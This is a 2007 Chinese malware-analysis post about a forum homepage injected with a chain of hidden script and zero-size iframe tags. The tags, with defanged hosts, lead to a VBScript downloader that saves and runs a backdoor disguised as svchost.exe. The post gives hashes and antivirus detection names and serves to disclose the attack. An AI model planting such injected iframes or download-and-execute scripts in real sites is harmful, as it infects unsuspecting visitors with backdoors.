endurer 原创
2007-01-31 第1版
论坛首页包含代码:/----<script src="hxxp://www.4**884**6*6.com.**/AdOpen***.asp?Adid=41&MyUserID=dy16"></script>----/AdOpen***.asp 中包含代码:/----<IFRAME frameBorder=0 height=0 scrolling=no src=hxxp://www***1*.site**e***m.com/***19/0**7/tx**049326/other/wu.htm width=0></IFRAME>----/wu.htm 中包含代码:/----<iframe src="xskj.htm" width="0" height="0" border="0"></iframe>----/
xskj.htm 中包含“Ja va script”脚本代码,功能是调用upescape()输出字符串。输出字符串是中包含多余空格的VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 all.exe,保存为 %temp%/svchost.exe,然后调用自定义函数yunxingexe(m5,Xskj9)。自定义函数yunxingexe()的功能是创建Shell.Application 对象XsKje,利用 XsKje 的 ShellExecute 方法 来运行 %temp%/svchost.exe。
/-----文件说明符 : D:/test/all.exe属性 : A---语言 : 中文(中国)文件版本 : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)说明 : Win32 Cabinet Self-Extractor 版权 : (C) Microsoft Corporation. All rights reserved.备注 : 产品版本 : 6.00.2900.2180产品名称 : Microsoft(R) Windows(R) Operating System公司名称 : Microsoft Corporation合法商标 : 内部名称 : Wextract 源文件名 : WEXTRACT.EXE 创建时间 : 2007-1-31 14:46:56修改时间 : 2007-1-31 14:46:56访问时间 : 2007-1-31 14:47:48大小 : 418304 字节 408.512 KBMD5 : d5dad180f81f12a01ab2b35cc72a8ed7-----/
原来是使用Windows自带的安装程序制作软件iexpress来打包。
其中包含2个文件:1)0113.exe是个WinRAR制作的自解压文件:/------;下面的注释包含自释放脚本命令Path=c:/Silent=1Overwrite=1------/释放到c:/的 0113.exe 采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo加壳。/------文件说明符 : D:/test/0113.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-1-14 17:48:12修改时间 : 2007-1-31 15:6:57访问时间 : 2007-1-31 15:8:35大小 : 338944 字节 331.0 KBMD5 : 818fefacaa3f7a2eafcfd2f0faa8acc3------/Kaspersky报为:Backdoor.Win32.Hupigon.czj瑞星报为:Backdoor.Gpigeon.2006.bbe
2)kb.exe采用GLBS Install Stub 32-bit -> Wise制作。/------文件说明符 : D:/test/kb.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-1-14 17:46:32修改时间 : 2007-1-14 17:46:32访问时间 : 2007-1-31 15:10:49大小 : 8704 字节 8.512 KBMD5 : 30916e8cca4b5afc05b41627de52e102------/
